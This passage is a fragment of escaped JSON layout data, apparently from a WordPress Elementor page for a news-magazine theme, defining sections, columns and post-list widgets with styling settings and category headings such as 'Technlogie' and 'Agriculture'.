ked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size